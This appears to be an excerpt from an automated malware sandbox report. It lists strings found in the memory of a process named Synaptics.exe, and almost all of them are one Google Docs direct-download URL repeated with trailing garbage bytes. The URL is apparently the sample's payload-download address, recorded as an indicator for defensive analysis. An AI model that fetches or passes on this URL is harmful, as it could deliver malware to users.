                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0;qK0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0=
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0I
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0P
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0c
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0r
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1.
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1A20
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Z
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1c%
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download27Y
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2g
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download37Y
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4w80
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4~6
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5l
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5p
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download64
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download67Y
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7G
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7J
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8?
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8G
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8J
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8hO0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9141
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9CJ2#
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;O
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=B61
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=q
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?H
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAC
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBI
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBr
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDH
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDy
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEB
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGl
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH.S3-
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHw
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJGt0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJJw1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJfO0
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL-_2
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLi;1
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLtd1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMD
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOm
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOq
                              Source: Synaptics.exe, 00000003.00000002.1840755698.000000000BBBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPm
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPq
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPy
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ%v
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ)U
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQB
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRH
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSj41
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTxX1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUA
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUO
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWIt0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWr
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX-C2
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXIa0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXi/1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYD
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ8
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_Ga0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaA
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadmob
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadanci
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbg
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcapt$
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.ne
